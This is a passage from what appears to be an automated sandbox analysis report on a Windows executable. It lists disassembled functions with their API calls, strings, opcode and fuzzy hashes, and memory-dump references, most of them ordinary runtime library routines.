                                                                                        • Opcode ID: db6ae0074ed855282495a25ef839ffde6b161c55a8c505cb1725ed8a6d5c8498
                                                                                        • Instruction ID: c595c3be7dcbdbba2f40eb3034dc4688a01a0e59c1dec2329269979808171d4a
                                                                                        • Opcode Fuzzy Hash: db6ae0074ed855282495a25ef839ffde6b161c55a8c505cb1725ed8a6d5c8498
                                                                                        • Instruction Fuzzy Hash: 25515C6670032395DB329A199C21B7673E0DFA1750F6AC61BF9C99B6C0FB6D8C418361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0038FE02,00000000,00000000,00000000,00000000,00000000,0038529F), ref: 0038F6CF
                                                                                        • __fassign.LIBCMT ref: 0038F74A
                                                                                        • __fassign.LIBCMT ref: 0038F765
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0038F78B
                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,0038FE02,00000000,?,?,?,?,?,?,?,?,?,0038FE02,00000000), ref: 0038F7AA
                                                                                        • WriteFile.KERNEL32(?,00000000,00000001,0038FE02,00000000,?,?,?,?,?,?,?,?,?,0038FE02,00000000), ref: 0038F7E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1324828854-0
                                                                                        • Opcode ID: 5db9e85fb4d69124dae72e1bc3b12bdc1a3db6fdd6ae6e50df92fe47003b7907
                                                                                        • Instruction ID: 4f51bcbf06bc860e9053dd3af21733da2b465ac36f9b01733c2b62d604c80713
                                                                                        • Opcode Fuzzy Hash: 5db9e85fb4d69124dae72e1bc3b12bdc1a3db6fdd6ae6e50df92fe47003b7907
                                                                                        • Instruction Fuzzy Hash: 2851A3B19003099FDB11DFA8DC85AEEBBF8EF09300F1541AAE555E7251E670AA40CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000800,?), ref: 0037CE9D
                                                                                          • Part of subcall function 0036B690: _wcslen.LIBCMT ref: 0036B696
                                                                                        • _swprintf.LIBCMT ref: 0037CED1
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • SetDlgItemTextW.USER32(?,00000066,003A946A), ref: 0037CEF1
                                                                                        • _wcschr.LIBVCRUNTIME ref: 0037CF22
                                                                                        • EndDialog.USER32(?,00000001), ref: 0037CFFE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                        • String ID: %s%s%u
                                                                                        • API String ID: 689974011-1360425832
                                                                                        • Opcode ID: 53eff0baa41b2f0329897d5e6279fabd99ea8ade8a8ef5ba1709fba0161f54ea
                                                                                        • Instruction ID: 7564973a3c1f479132d0fe3db62590c168a8150e497608c6c3e502c623f2d1e8
                                                                                        • Opcode Fuzzy Hash: 53eff0baa41b2f0329897d5e6279fabd99ea8ade8a8ef5ba1709fba0161f54ea
                                                                                        • Instruction Fuzzy Hash: 84416071900658AADF36DB50DC45EEA77BCEB05300F40C0A6F90DE7041EB789A44CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00382900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00382937
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0038293F
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 003829C8
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 003829F3
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00382A48
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 1170836740-1018135373
                                                                                        • Opcode ID: 854a40ba1ba5bebde62accabca9f04b345533e0fb35403235c1206b8f5c219e4
                                                                                        • Instruction ID: de3babe8bf5b6772dae09a79da6d80216a5897988ca1816a6ec46cd607ff1081
                                                                                        • Opcode Fuzzy Hash: 854a40ba1ba5bebde62accabca9f04b345533e0fb35403235c1206b8f5c219e4
                                                                                        • Instruction Fuzzy Hash: 6041C234A00308AFCF16EF68C885A9FBBF5AF45324F1480D6E815AB392D735DA51CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00379955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                        • API String ID: 176396367-3743748572
                                                                                        • Opcode ID: b24059fc615b968bfcd5ec5f91164314fe3e878da154d4a419e41a659f5f0922
                                                                                        • Instruction ID: 36d0c408be98843a75ecfe7dff2c8374419f6cb5ba02bd1846399e8ca077fb15
                                                                                        • Opcode Fuzzy Hash: b24059fc615b968bfcd5ec5f91164314fe3e878da154d4a419e41a659f5f0922
                                                                                        • Instruction Fuzzy Hash: A631A27264430556DA32BB549C03F7B73A4EB80720F51C61FF98A4B2C0FB68BD4183A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0038C868: _free.LIBCMT ref: 0038C891
                                                                                        • _free.LIBCMT ref: 0038C8F2
                                                                                          • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                          • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                        • _free.LIBCMT ref: 0038C8FD
                                                                                        • _free.LIBCMT ref: 0038C908
                                                                                        • _free.LIBCMT ref: 0038C95C
                                                                                        • _free.LIBCMT ref: 0038C967
                                                                                        • _free.LIBCMT ref: 0038C972
                                                                                        • _free.LIBCMT ref: 0038C97D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                        • Instruction ID: bf1f6088252f0041dacd8b31dbabbf9fb8f6507266c8744e43d4b1591f41a24c
                                                                                        • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                        • Instruction Fuzzy Hash: 5E1163715D0B08BAE522B7B1CC0BFCB7BADEF00B00F801C55B29D6E592EA75B5098760
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0037E669,0037E5CC,0037E86D), ref: 0037E605
                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0037E61B
                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0037E630
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                        • API String ID: 667068680-1718035505
                                                                                        • Opcode ID: 9bca716975354faa2f58efcfa3070d5f678716004981292273373ca8ec3d5c59
                                                                                        • Instruction ID: a38114352668f05c9ee803f0372b35c57939219cbbe0d683dbaaf639ac8906d7
                                                                                        • Opcode Fuzzy Hash: 9bca716975354faa2f58efcfa3070d5f678716004981292273373ca8ec3d5c59
                                                                                        • Instruction Fuzzy Hash: 7DF02BB57802225B4F335F755C84AA632CC6B2E741712C4B9E90ED3201EB28CC606B90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00388900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 0038891E
                                                                                          • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                          • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                        • _free.LIBCMT ref: 00388930
                                                                                        • _free.LIBCMT ref: 00388943
                                                                                        • _free.LIBCMT ref: 00388954
                                                                                        • _free.LIBCMT ref: 00388965
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID: p9
                                                                                        • API String ID: 776569668-1904256876
                                                                                        • Opcode ID: fdf6a842b2277d13eaa610a2fb94ee3449f362d5e48a9d1b15ac801979258f33
                                                                                        • Instruction ID: 51f6e7597ec5d839c00307d72c53b6ae5e7a73af024ecd2d107c4f3c9e006e50
                                                                                        • Opcode Fuzzy Hash: fdf6a842b2277d13eaa610a2fb94ee3449f362d5e48a9d1b15ac801979258f33
                                                                                        • Instruction Fuzzy Hash: DDF0D076810212DB8687BF24FD018163BAAF724724F810546F554D63B1CFB25D569B91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 003714C2
                                                                                          • Part of subcall function 0036B146: GetVersionExW.KERNEL32(?), ref: 0036B16B
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003714E6
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00371500
                                                                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00371513
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371523
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371533
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2092733347-0
                                                                                        • Opcode ID: 2ce4ed4a85ffaa945ade7845202aa451fbfef8579b5f7433d189b63a69fe0ff1
                                                                                        • Instruction ID: 1972b86c7d3284ff62065b7c64640106545071710f9e9525fbefeadb87153ffc
                                                                                        • Opcode Fuzzy Hash: 2ce4ed4a85ffaa945ade7845202aa451fbfef8579b5f7433d189b63a69fe0ff1
                                                                                        • Instruction Fuzzy Hash: 3C31FA76118305ABC705DFA9C88499BB7FCBF98714F00491EF599C3210E734D549CBA6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00382AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,00382AF1,003802FC,0037FA34), ref: 00382B08
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00382B16
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00382B2F
                                                                                        • SetLastError.KERNEL32(00000000,00382AF1,003802FC,0037FA34), ref: 00382B81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: e80ce4c742d380274ef1b744e83adc6e54b09779edede39619d455edec941e4b
                                                                                        • Instruction ID: a56b27f71d7cf575e9d17aa7a2d3d3d8bb1a5e51ffa4cc694eb2df827d21dfcf
                                                                                        • Opcode Fuzzy Hash: e80ce4c742d380274ef1b744e83adc6e54b09779edede39619d455edec941e4b
                                                                                        • Instruction Fuzzy Hash: 4001D43310A711AEE6273BF4BC899672B9DEB41BB4B6007BBF510592E0EF625C40D344
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003897E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,003A1098,00384674,003A1098,?,?,003840EF,?,?,003A1098), ref: 003897E9
                                                                                        • _free.LIBCMT ref: 0038981C
                                                                                        • _free.LIBCMT ref: 00389844
                                                                                        • SetLastError.KERNEL32(00000000,?,003A1098), ref: 00389851
                                                                                        • SetLastError.KERNEL32(00000000,?,003A1098), ref: 0038985D
                                                                                        • _abort.LIBCMT ref: 00389863
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 3160817290-0
                                                                                        • Opcode ID: 90d6cc41c82276ffbb13b7b9540c35035b1c9338e007a0434e8b7032fad79166
                                                                                        • Instruction ID: f8fae1f6cb7768ed38c9422440caccb48a6fcf59ebc2f55428593429b002ac63
                                                                                        • Opcode Fuzzy Hash: 90d6cc41c82276ffbb13b7b9540c35035b1c9338e007a0434e8b7032fad79166
                                                                                        • Instruction Fuzzy Hash: 22F0C83614070366C6133374BC0AB7B1A6D8FD2771F2A05ABF525AA292FF3188068765
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0037DC47
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037DC61
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037DC72
                                                                                        • TranslateMessage.USER32(?), ref: 0037DC7C
                                                                                        • DispatchMessageW.USER32(?), ref: 0037DC86
                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0037DC91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 2148572870-0
                                                                                        • Opcode ID: 5bf4e77677001fdf783dde8d167976c6580c101bddcafb44700d6af329d52384
                                                                                        • Instruction ID: 3ec7e4b3a4e686e1f298604d8da7f75361064f9c24627bfa1c4cfa752fd3d022
                                                                                        • Opcode Fuzzy Hash: 5bf4e77677001fdf783dde8d167976c6580c101bddcafb44700d6af329d52384
                                                                                        • Instruction Fuzzy Hash: ABF03C72A01229BBCB326BA5EC4DDDB7F7DEF41791F008011B50BD2050D6799646CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0037A699: GetDC.USER32(00000000), ref: 0037A69D
                                                                                          • Part of subcall function 0037A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0037A6A8
                                                                                          • Part of subcall function 0037A699: ReleaseDC.USER32(00000000,00000000), ref: 0037A6B3
                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 0037A83C
                                                                                          • Part of subcall function 0037AAC9: GetDC.USER32(00000000), ref: 0037AAD2
                                                                                          • Part of subcall function 0037AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0037AB01
                                                                                          • Part of subcall function 0037AAC9: ReleaseDC.USER32(00000000,?), ref: 0037AB99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                        • String ID: "7$($A7
                                                                                        • API String ID: 1061551593-3396645701
                                                                                        • Opcode ID: 9640c8597578d0effdccbf1cb95a8ef6ddb4aaf1c5e3412271874d7f6e2dd501
                                                                                        • Instruction ID: dc3a7abdf124029d27981604d5698bb97cf0bb1aebefc952a537c13489f3cc48
                                                                                        • Opcode Fuzzy Hash: 9640c8597578d0effdccbf1cb95a8ef6ddb4aaf1c5e3412271874d7f6e2dd501
                                                                                        • Instruction Fuzzy Hash: A991F2B1608754AFD661DF29C84492BBBF8FFC9700F00891EF59AD3260DB35A945CB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
                                                                                          • Part of subcall function 0036B92D: _wcsrchr.LIBVCRUNTIME ref: 0036B944
                                                                                        • _wcslen.LIBCMT ref: 0036C197
                                                                                        • _wcslen.LIBCMT ref: 0036C1DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
